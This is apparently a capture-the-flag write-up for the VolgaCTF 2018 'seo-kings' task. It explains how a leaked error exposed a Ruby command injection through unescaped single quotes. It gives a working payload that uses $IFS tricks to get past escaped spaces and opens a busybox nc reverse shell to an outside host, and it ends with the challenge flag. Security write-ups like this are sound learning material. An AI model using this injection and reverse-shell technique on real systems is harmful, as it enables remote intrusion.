The site exposes SEO service which requests like this:

```
POST http://seo-kings.quals.2018.volgactf.ru:8080/ HTTP/1.1
Host: seo-kings.quals.2018.volgactf.ru:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 7

site=<my_url>
```

If an array is given as `site` parameter, like `site[]=`, the server emits an error:

```
NoMethodError at /
undefined method `gsub' for [""]:Array
file: rfc2396_parser.rb location: escape line: 305

```

And guess what? Some partial source code is revealed in the error message, and there is:

```
/opt/seo-kings/app/controllers/main_controller.rb in runAdmin
pid = Process.spawn("phantomjs --web-security=no bot.js '" + URI.escape(site) + "'")
/opt/seo-kings/app/controllers/main_controller.rb in block in <class:MainController>
runAdmin(site)
```

Look at **`pid = Process.spawn("phantomjs --web-security=no bot.js '" + URI.escape(site) + "'")`**. `site` is user input, and by URI.escape, '(0x27) is not escaped! So there is a command injection vulnerability.

Since all spaces including %20, %09-%0c and [], {} are escaped (and dollar sign is not escaped), I could use $IFS to make spaces in the command. Like, `ls$IFS-al`.

But if non-first arguments doesn't start with non-alphanumeric characters, it'll become like this:

```
nc 1.2.3.4 -> nc$IFS1.2.3.4 ?
$IFS1 is not defined, so it'll become nc .2.3.4.
```

Fortunately `()` is not escaped, so we can do like this:

```
nc$IFS$()1.2.3.4
```

$() is the output of empty command, which is zero-length character. It was used to separate IFS and other characters.

The final payload:

```
site=';busybox$IFS$()nc$IFS$()1.2.3.4$IFS$()10000$IFS$()-esh;'
```

After obtaining shell, I saw .bash_history in the user directory, which has this:

```
vi file_wiht_flag.rb
```

I ran `find / -name file_wiht_flag.rb`, and there was:

```
...
'VolgaCTF{hope_it_was_like_madness}'
...
```